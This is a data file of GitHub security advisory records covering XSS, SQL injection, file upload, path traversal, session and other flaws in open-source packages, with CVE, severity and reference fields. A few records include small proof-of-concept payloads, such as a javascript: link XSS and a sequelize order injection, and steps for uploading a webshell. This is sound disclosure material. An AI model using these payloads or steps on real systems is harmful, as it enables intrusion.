In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the `name` parameter in `noticeWizard` endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.
{'CVE-2021-25929'}
2021-05-28T22:27:12Z
2021-05-25T18:46:58Z
MODERATE
4.8
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-25929', 'https://github.com/OpenNMS/opennms/commit/66c1f626bf38a7d1a9530b4d68598269ee5245a2', 'https://github.com/advisories/GHSA-jmv4-73v2-pvgc', 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25929'}
null
GHSA
GHSA-ch3h-j2vf-95pv
XSS Vulnerability in Action View tag helpers
There is a possible XSS vulnerability in Action View tag helpers. Passing untrusted input as hash keys can lead to a possible XSS vulnerability. This vulnerability has been assigned the CVE identifier CVE-2022-27777. Versions Affected: ALL Not affected: NONE Fixed Versions: 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1 ## Impact If untrusted data is passed as the hash key for tag attributes, there is a possibility that the untrusted data may not be properly escaped which can lead to an XSS vulnerability. Impacted code will look something like this: ``` check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' }) ``` Where the "malicious_input" variable contains untrusted data. All users running an affected release should either upgrade or use one of the workarounds immediately. ## Releases The FIXED releases are available at the normal locations. ## Workarounds Escape the untrusted data before using it as a key for tag helper methods.
{'CVE-2022-27777'}
2022-04-27T23:00:15Z
2022-04-27T22:32:49Z
HIGH
0
{'CWE-79'}
{'https://rubyonrails.org/2022/4/26/Rails-7-0-2-4-6-1-5-1-6-0-4-8-and-5-2-7-1-have-been-released', 'https://github.com/advisories/GHSA-ch3h-j2vf-95pv', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27777', 'https://groups.google.com/g/ruby-security-ann/c/9wJPEDv-iRw', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2022-27777.yml', 'https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85'}
null
GHSA
GHSA-xqg8-cv3h-xppv
SQL Injection in sequelize
Versions 2.0.0-rc-7 and earlier of `sequelize` are affected by a SQL injection vulnerability when user input is passed into the order parameter. ## Proof of Concept ```javascript Test.findAndCountAll({ where: { id :1 }, order : [['id', 'UNTRUSTED USER INPUT']] }) ``` ## Recommendation Update to version 2.0.0-rc8 or later
{'CVE-2015-1369'}
2021-09-22T15:12:12Z
2017-10-24T18:33:36Z
HIGH
0
{'CWE-89'}
{'https://github.com/sequelize/sequelize/issues/2906', 'http://www.openwall.com/lists/oss-security/2015/01/23/2', 'https://github.com/sequelize/sequelize/pull/2919', 'https://www.npmjs.com/advisories/33', 'https://nvd.nist.gov/vuln/detail/CVE-2015-1369', 'https://github.com/advisories/GHSA-xqg8-cv3h-xppv', 'https://nodesecurity.io/advisories/sequelize-sql-injection-order'}
null
GHSA
GHSA-f8x6-m9f5-ffp8
Unrestricted Upload of File with Dangerous Type in unisharp/laravel-filemanager
This affects the package unisharp/laravel-filemanager from 0.0.0. The upload() function does not sufficiently validate the file type when uploading. An attacker may be able to reproduce the following steps: - Install a package with a web Laravel application. - Navigate to the Upload window - Upload an image file, then capture the request - Edit the request contents with a malicious file (webshell) - Enter the path of file uploaded on URL - Remote Code Execution **Note: Prevention for bad extensions can be done by using a whitelist in the config file(lfm.php). Corresponding document can be found in the [here](https://unisharp.github.io/laravel-filemanager/configfolder-categories).
{'CVE-2021-23814'}
2022-01-06T21:08:34Z
2022-01-06T21:08:34Z
MODERATE
6.7
{'CWE-434'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23814', 'https://github.com/advisories/GHSA-f8x6-m9f5-ffp8', 'https://github.com/UniSharp/laravel-filemanager/blob/master/src/Controllers/UploadController.php%23L26', 'https://snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-1567199'}
null
GHSA
GHSA-9j49-mfvp-vmhm
Code Injection in pac-resolver
This affects the package pac-resolver before 5.0.0. This can occur when used with untrusted input, due to unsafe PAC file handling. **NOTE:** The fix for this vulnerability is applied in the node-degenerator library, a dependency written by the same maintainer.
{'CVE-2021-23406'}
2021-09-02T17:10:06Z
2021-09-02T17:10:06Z
HIGH
8.1
{'CWE-94'}
{'https://snyk.io/vuln/SNYK-JS-PACRESOLVER-1564857', 'https://github.com/advisories/GHSA-9j49-mfvp-vmhm', 'https://github.com/TooTallNate/node-degenerator/commit/9d25bb67d957bc2e5425fea7bf7a58b3fc64ff9e', 'https://github.com/TooTallNate/node-pac-resolver/releases/tag/5.0.0', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1568506', 'https://github.com/TooTallNate/node-degenerator/commit/ccc3445354135398b6eb1a04c7d27c13b833f2d5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23406'}
null
GHSA
GHSA-3fx4-7f69-5mmg
Integer Overflow in go-jose
go-jose before 1.0.5 suffers from a CBC-HMAC integer overflow on 32-bit architectures. An integer overflow could lead to authentication bypass for CBC-HMAC encrypted ciphertexts on 32-bit architectures.
{'CVE-2016-9123'}
2021-06-23T17:14:12Z
2021-06-23T17:14:12Z
HIGH
7.5
{'CWE-190'}
{'https://www.openwall.com/lists/oss-security/2016/11/03/1', 'https://github.com/square/go-jose/commit/789a4c4bd4c118f7564954f441b29c153ccd6a96', 'https://nvd.nist.gov/vuln/detail/CVE-2016-9123', 'https://hackerone.com/reports/165170', 'https://github.com/advisories/GHSA-3fx4-7f69-5mmg'}
null
GHSA
GHSA-qr4p-c9wr-phr6
Prototype pollution in set-in
Prototype pollution vulnerability in 'set-in' versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.
{'CVE-2020-28273'}
2021-03-19T21:01:46Z
2021-03-19T21:01:46Z
CRITICAL
9.8
{'CWE-1321'}
{'https://github.com/ahdinosaur/set-in/commit/e431effa00195a6f06b111e09733cd1445a91a88', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28273', 'https://github.com/advisories/GHSA-qr4p-c9wr-phr6', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28273'}
null
GHSA
GHSA-fpwp-69xv-c67f
Moderate severity vulnerability that affects aiohttp-session
The pypi package aiohttp-session before 2.4.0 contained a Session Fixation vulnerability in load_session function for RedisStorage that can result in Session Hijacking. This attack appear to be exploitable via Any method that allows setting session cookies (?session=<>, or meta tags or script tags with Set-Cookie).
{'CVE-2018-1000519'}
2021-09-10T18:44:34Z
2018-09-13T15:46:40Z
MODERATE
6.5
{'CWE-384'}
{'https://github.com/aio-libs/aiohttp-session/issues/272', 'https://github.com/aio-libs/aiohttp-session/blob/master/aiohttp_session/redis_storage.py#L60', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000519', 'https://github.com/advisories/GHSA-fpwp-69xv-c67f'}
null
GHSA
GHSA-7mx5-x372-xh87
Incorrect Session Validation in Apache Airflow
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.
{'CVE-2020-17526'}
2021-06-30T17:55:59Z
2021-04-20T16:40:27Z
HIGH
7.7
{'CWE-269'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-17526', 'http://www.openwall.com/lists/oss-security/2020/12/21/1', 'https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E', 'https://github.com/advisories/GHSA-7mx5-x372-xh87', 'https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E'}
null
GHSA
GHSA-f9vc-q3hh-qhfv
Content Injection in remarkable
Versions 1.4.0 and earlier of `remarkable` are affected by a cross-site scripting vulnerability. This occurs because vulnerable versions of `remarkable` did not properly whitelist link protocols, and consequently allowed `javascript:` to be used. ### Proof of Concept Markdown Source: ``` [link](<javascript:alert(1)>) ``` Rendered HTML: ``` <a href="javascript:alert(1)">link</a> ``` ## Recommendation Update to version 1.4.1 or later
{'CVE-2014-10065'}
2021-01-08T21:15:50Z
2020-08-31T22:56:00Z
HIGH
0
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2014-10065', 'https://github.com/advisories/GHSA-f9vc-q3hh-qhfv', 'https://github.com/jonschlinkert/remarkable/issues/97', 'https://nodesecurity.io/advisories/30', 'https://www.npmjs.com/advisories/30'}
null
GHSA
GHSA-997c-fj8j-rq5h
Arbitrary Code Execution
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
{'CVE-2014-9357'}
2022-04-12T22:01:45Z
2022-02-15T01:57:18Z
HIGH
9.8
{'CWE-285'}
{'http://www.securityfocus.com/archive/1/534215/100/0/threaded', 'https://github.com/docker/docker/compare/aef842e7dfb534aba22c3c911de525ce9ac12b72...313a1b7620910e47d888f8b0a6a5eb06ad9c1ff2', 'https://groups.google.com/forum/#!msg/docker-user/nFAz-B-n4Bw/0wr3wvLsnUwJ', 'https://nvd.nist.gov/vuln/detail/CVE-2014-9357', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9357', 'https://github.com/moby/moby/blob/master/CHANGELOG.md#133-2014-12-11', 'https://groups.google.com/forum/#%21msg/docker-user/nFAz-B-n4Bw/0wr3wvLsnUwJ', 'https://github.com/advisories/GHSA-997c-fj8j-rq5h'}
null
GHSA
GHSA-m6gx-rhvj-fh52
Denial of service in go-ethereum due to CVE-2020-28362
### Impact Versions of Geth built with Go `<1.15.5` or `<1.14.12` are most likely affected by a critical DoS-related security vulnerability. The golang team has registered the underlying flaw as ‘CVE-2020-28362’. We recommend all users to rebuild (ideally `v1.9.24`) with Go `1.15.5` or `1.14.12`, to avoid node crashes. Alternatively, if you are running binaries distributed via one of our official channels, we’re going to release `v1.9.24` ourselves built with Go `1.15.5`. ### Patches This is not an issue in go-ethereum, rebuilding an older version with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability. ### Workarounds Rebuilding with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability. ### References - https://blog.ethereum.org/2020/11/12/geth_security_release/ - https://groups.google.com/g/golang-announce/c/NpBGTTmKzpM ### For more information If you have any questions or comments about this advisory: * Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) * Email us at [security@ethereum.org](mailto:security@ethereum.org)
null
2021-10-08T21:25:44Z
2021-06-29T21:13:54Z
CRITICAL
0
null
{'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-m6gx-rhvj-fh52', 'https://github.com/advisories/GHSA-m6gx-rhvj-fh52'}
null
GHSA
GHSA-2grh-hm3w-w7hv
Race condition in tokio
An issue was discovered in the tokio crate before 1.8.1 for Rust. Upon a JoinHandle::abort, a Task may be dropped in the wrong thread.
{'CVE-2021-38191'}
2021-08-25T20:55:51Z
2021-08-25T20:55:51Z
MODERATE
5.9
{'CWE-362', 'CWE-366'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0072.html', 'https://github.com/advisories/GHSA-2grh-hm3w-w7hv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38191', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/tokio/RUSTSEC-2021-0072.md', 'https://github.com/tokio-rs/tokio/issues/3929'}
null
GHSA
GHSA-gx2c-fvhc-ph4j
Path traversal in Hadoop
In Apache Hadoop, The unTar function uses unTarUsingJava function on Windows and the built-in tar utility on Unix and other OSes. As a result, a TAR entry may create a symlink under the expected extraction directory which points to an external directory. A subsequent TAR entry may extract an arbitrary file into the external directory using the symlink name. This however would be caught by the same targetDirPath check on Unix because of the getCanonicalPath call. However on Windows, getCanonicalPath doesn't resolve symbolic links, which bypasses the check. unpackEntries during TAR extraction follows symbolic links which allows writing outside expected base directory on Windows. This was addressed in Apache Hadoop 3.2.3
{'CVE-2022-26612'}
2022-04-19T15:09:07Z
2022-04-08T00:00:21Z
CRITICAL
9.8
{'CWE-22'}
{'https://lists.apache.org/thread/hslo7wzw2449gv1jyjk8g6ttd7935fyz', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26612', 'https://github.com/advisories/GHSA-gx2c-fvhc-ph4j'}
null
GHSA
GHSA-q854-j362-cfq9
Cross-site Scripting in jsoneditor
Stored XSS was discovered in the tree mode of jsoneditor before 9.0.2 through injecting and executing JavaScript.
{'CVE-2020-23849'}
2021-10-12T16:22:30Z
2021-10-12T16:22:30Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/josdejong/jsoneditor/issues/1029', 'https://github.com/advisories/GHSA-q854-j362-cfq9', 'https://nvd.nist.gov/vuln/detail/CVE-2020-23849'}
null